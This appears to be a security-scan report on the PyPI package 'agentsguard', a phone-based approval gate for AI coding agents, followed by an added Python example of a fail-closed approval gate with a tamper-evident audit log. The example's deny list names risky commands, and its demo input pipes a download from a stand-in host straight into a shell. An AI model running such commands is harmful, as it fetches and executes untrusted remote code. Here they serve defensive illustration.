agentsguard

v0.3.1 suspicious
6.0
Medium Risk

Approve or deny your AI coding agent's risky commands from your phone, with an audit trail. Works with Claude Code and OpenAI Codex.

🤖 AI Analysis

Final verdict: SUSPICIOUS

The package is rated moderate risk because of its outbound network calls and one code pattern flagged as obfuscation. Either could in principle serve unauthorized data transmission or conceal behaviour, but both are also what the advertised feature (relaying approval requests to a phone) requires; the source repository could not be retrieved, so the behaviour was not confirmed against public source.

  • High network risk (6 outbound call patterns, heuristic score 9.0)
  • Obfuscation risk flagged (a single dynamic-import pattern, heuristic score 2.0)
Per-check LLM notes
  • Network: six outbound calls, all built from a caller-supplied relay/base URL and covering a health check, phone pairing (`/pair/start`, `/pair/await`) and approval creation and polling (`/cli/approvals`). This matches the advertised phone-approval flow rather than unexplained beaconing, but the relay receives every approval request, so whoever operates it sees whatever those requests contain; confirm the relay endpoint is one you run or trust before use.
  • Shell: no shell execution patterns were detected, so direct system command execution by the package itself is unlikely.
  • Obfuscation: the one flagged pattern is a dynamic `__import__(..., fromlist=["scan"])` call, not encoded or minified code. Dynamic imports are a routine way to lazy-load a module or break an import cycle, so this is a weak signal on its own. Note that the imported module path is `agentguard.secrets_scan` while the distribution is named `agentsguard`; verify that the installed import name is the one you expect.
  • Credentials: no credential-harvesting patterns detected. The flagged snippet calls a `secrets_scan.scan` function on an `apply_patch` input built from a `SECRET_PATCH` constant, which reads like a test of a built-in secret scanner; reviewing that function is the quickest way to confirm it only detects secrets and does not transmit them.
  • Metadata: the maintainer account has only this one package on PyPI and the linked repository returns 404 (deleted or private). That limits what can be verified and raises suspicion, but is not on its own evidence of malice.

📦 Package Quality Overall: Low (4.8/10)

✦ High Test Suite 9.0

Test suite present — 5 test file(s) found

  • 5 test file(s) detected (e.g. __init__.py). Caveat: `__init__.py` is a package marker, not a test, so the count and the 9.0 score may be inflated; check how many of the files actually contain test functions.
◈ Medium Documentation 5.0

Some documentation present

  • Detailed PyPI description (4446 chars)
○ Low Contributing Guide 4.0

No contributing guide or governance files found

  • Development Status classifier >= Beta
◈ Medium Type Annotations 5.0

Partial type annotation coverage

  • 90 type-annotated function signatures detected in source
○ Low Multiple Contributors 1.0

Could not retrieve contributor data from GitHub

  • GitHub API error: 404

🔬 Heuristic Checks

Outbound Network Calls score 9.0

Found 6 network call pattern(s). All six use `requests` against a URL built from a caller-supplied `url`, `relay_url` or `base` value and cover a health check, pairing (`/pair/start`, `/pair/await`) and approval create/poll (`/cli/approvals`, `/cli/approvals/{approval_id}`); the `wait` parameter on the poll calls indicates long-polling for the phone's decision.

  • False try: r = requests.get(f"{url.rstrip('/')}/health", timeout=timeout) retur
  • load + secret.""" resp = requests.post( f"{relay_url.rstrip('/')}/pair/start", js
  • try: r = requests.get(f"{relay_url.rstrip('/')}/pair/await", params={"wait": 25},
  • err) try: r = requests.post( f"{base}/cli/approvals", json={"c
  • try: requests.post( f"{base}/cli/approvals/{approval_i
  • try: pr = requests.get(f"{base}/cli/approvals/{approval_id}", params={"wait": 20},
Code Obfuscation score 2.0

Found 1 obfuscation pattern(s): a dynamic `__import__` call with `fromlist`, not encoded or minified code

  • ol_input.command). leak = __import__("agentguard.secrets_scan", fromlist=["scan"]).scan(cli._scannable("apply_patch", {"command": SECRET_PATCH
Shell / Subprocess Execution

No shell execution patterns detected

Credential Harvesting

No credential harvesting patterns detected

Typosquatting

No typosquatting candidates detected

Registered Email Domain

No author email provided

Suspicious Page Links

All external links appear legitimate

Git Repository History score 3.0

Repository not found (deleted or private)

Maintainer History score 2.0

1 maintainer concern(s) found

  • Author "AgentGuard" appears to have only 1 package on PyPI (new or inactive account)
Known CVE Vulnerabilities

No known vulnerabilities found in OSV database.

💡 AI App Starter Prompt

Use this prompt to build a project with agentsguard
Develop a mobile-friendly web application named 'GuardianCode' using Python's 'agentsguard' package, which allows users to monitor and control their AI coding agents through their smartphones. This app will serve as a security layer between the user and their AI coding assistants, ensuring that no harmful or unauthorized commands are executed.

**Core Features:**
1. **Real-Time Monitoring:** Users should be able to see real-time updates on the actions their AI coding agent is attempting to perform.
2. **Approval/Denial System:** Users must be able to approve or deny specific actions requested by the AI coding agent from their smartphone. The approval channel should be low-latency and authenticated, every decision should be tied to the exact command it covers, and the gate must fail closed: if no decision arrives before a timeout, the action is not executed.
3. **Audit Trail:** Every action attempted by the AI coding agent, whether approved or denied, should be logged in an audit trail accessible to the user.
4. **Mobile-Friendly Interface:** The web application must have a clean, intuitive interface designed specifically for use on mobile devices.
5. **Integration with Popular AI Coding Agents:** The application should support integration with popular AI coding agents like Claude Code and OpenAI Codex.

**How 'agentsguard' Package is Utilized:**
- Use 'agentsguard' to intercept command requests from the AI coding agent before they are executed.
- Employ the package's functionality to send these intercepted commands to the user's smartphone for approval or denial.
- Leverage the logging capabilities of 'agentsguard' to maintain an audit trail of all actions attempted by the AI coding agent.

**Development Steps:**
1. Set up a Flask backend server to handle communication between the AI coding agent and the user's smartphone.
2. Integrate the 'agentsguard' package into the Flask application to manage command interception and approval processes.
3. Develop a React frontend for the mobile-friendly web application, focusing on simplicity and usability.
4. Implement real-time data streaming between the backend and frontend using WebSockets to ensure users receive instant updates on their AI coding agent's actions.
5. Test the application thoroughly to ensure seamless interaction between the AI coding agent, the Flask backend, and the React frontend.
6. Deploy the application to a cloud service provider like AWS or Heroku for public access.
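The approve/deny-with-audit-trail flow that the starter prompt describes, as an added Python example that is not code from the agentsguard package or from this page: the `classify` rules, the `ApprovalGate` and `AuditLog` names, the in-process `decider` standing in for the phone, and the hash-chained log format are all assumptions made for the example. It shows the two properties a practitioner would insist on in such a gate: fail closed (an unanswered or unrecognised command is not run) and a tamper-evident log (each entry commits to the previous entry's hash, so `verify()` fails after any edit).

```python
"""Human-in-the-loop command gate with a tamper-evident audit trail.

Added illustration of the approve/deny pattern described on this page. It is
not code from the agentsguard package: the names, the risk rules, the
in-process 'phone' decider and the audit-log format are all assumptions.
"""
import hashlib
import json
import re
import time
from typing import Callable, Optional

# Assumed risk rules: a command matching any of these needs a human decision.
RISKY_PATTERNS = [
    (r"\brm\s+-[a-zA-Z]*r", "recursive delete"),
    (r"\bgit\s+push\b.*--force", "force push"),
    (r"\bcurl\b.*\|\s*(ba)?sh\b", "pipe remote script to shell"),
    (r"\bsudo\b", "privilege escalation"),
    (r"\bchmod\s+[0-7]*7\b", "world-writable permission"),
]
# Assumed allow-list of read-only commands that never need approval.
SAFE_PREFIXES = ("ls", "cat", "git status", "git diff", "pytest")


def classify(command: str) -> tuple:
    """Return ("allow" | "ask", reason). Unknown commands fail closed to "ask"."""
    for pattern, reason in RISKY_PATTERNS:
        if re.search(pattern, command):
            return "ask", reason
    if command.strip().startswith(SAFE_PREFIXES):
        return "allow", "allow-listed"
    return "ask", "not allow-listed"


class AuditLog:
    """Append-only log where each entry commits to the previous entry's hash,
    so editing or deleting an entry breaks verification."""

    GENESIS = "0" * 64

    def __init__(self):
        self.entries = []

    @staticmethod
    def _digest(prev_hash: str, event: dict) -> str:
        body = json.dumps(event, sort_keys=True, separators=(",", ":"))
        return hashlib.sha256((prev_hash + body).encode()).hexdigest()

    def append(self, event: dict) -> str:
        prev_hash = self.entries[-1]["hash"] if self.entries else self.GENESIS
        entry = {"prev": prev_hash, "event": event, "hash": self._digest(prev_hash, event)}
        self.entries.append(entry)
        return entry["hash"]

    def verify(self) -> bool:
        prev_hash = self.GENESIS
        for entry in self.entries:
            if entry["prev"] != prev_hash or entry["hash"] != self._digest(prev_hash, entry["event"]):
                return False
            prev_hash = entry["hash"]
        return True


class ApprovalGate:
    """Sits between the agent and the shell. `decider(approval_id, command)` stands
    in for the phone: it returns "approve", "deny", or None (no answer yet)."""

    def __init__(self, decider: Callable[[str, str], Optional[str]], audit: AuditLog, timeout_s: float = 30.0):
        self.decider = decider
        self.audit = audit
        self.timeout_s = timeout_s

    def gate(self, command: str) -> bool:
        verdict, reason = classify(command)
        if verdict == "allow":
            self.audit.append({"command": command, "decision": "auto-allow", "reason": reason})
            return True
        approval_id = hashlib.sha256(f"{time.time_ns()}:{command}".encode()).hexdigest()[:12]
        deadline = time.monotonic() + self.timeout_s
        decision = self.decider(approval_id, command)
        # Poll until the human answers or the deadline passes (long-poll stand-in).
        while decision not in ("approve", "deny") and time.monotonic() < deadline:
            time.sleep(0.01)
            decision = self.decider(approval_id, command)
        if decision not in ("approve", "deny"):
            decision = "timeout-deny"  # fail closed: no answer means no execution
        self.audit.append({"id": approval_id, "command": command, "decision": decision, "reason": reason})
        return decision == "approve"


if __name__ == "__main__":
    decisions = {"git push --force origin main": "approve"}  # constructed phone answers
    log = AuditLog()
    gate = ApprovalGate(lambda aid, cmd: decisions.get(cmd), log, timeout_s=0.05)
    for cmd in ("git status", "rm -rf build/", "git push --force origin main", "curl https://example.invalid/x | sh"):
        print(f"{cmd!r:45} -> {'run' if gate.gate(cmd) else 'blocked'}")
    print("audit chain intact:", log.verify())
```

The real package relays requests over HTTP to a phone (the `/cli/approvals` create and poll calls flagged in the heuristic checks); here `decider` replaces that transport so the example runs offline, and the audit entries stay in memory rather than being written to disk.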